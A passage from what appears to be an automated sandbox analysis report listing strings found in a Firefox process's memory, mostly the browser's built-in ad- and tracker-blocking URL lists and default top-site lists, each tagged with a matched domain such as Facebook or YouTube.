"://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF963C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF963C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"] equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]][{incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.c
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]]["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF9664000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF9664000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE50C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000003.2838031242.0000019D05A6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2815333733.0000019CFE569000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2932386721.00000595B9F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/p equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000003.2838031242.0000019D05A6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2933623282.000014908F32E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2932386721.00000595B9F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/( equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
